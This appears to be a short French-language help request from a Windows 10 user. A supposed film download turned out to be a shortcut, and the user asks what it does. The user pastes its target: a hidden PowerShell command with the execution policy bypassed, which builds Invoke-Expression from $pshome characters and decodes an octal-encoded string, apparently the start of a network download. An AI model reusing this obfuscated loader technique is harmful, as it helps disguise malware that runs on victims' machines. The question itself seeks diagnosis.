Dans Windows 10, j'ai téléchargé ce fichier que je pensais être un film mais c'était un raccourci avec une taille de 700 Mo
Je vois que la cible est la suivante
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
Et il était configuré pour démarrer à
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
Que fait-il?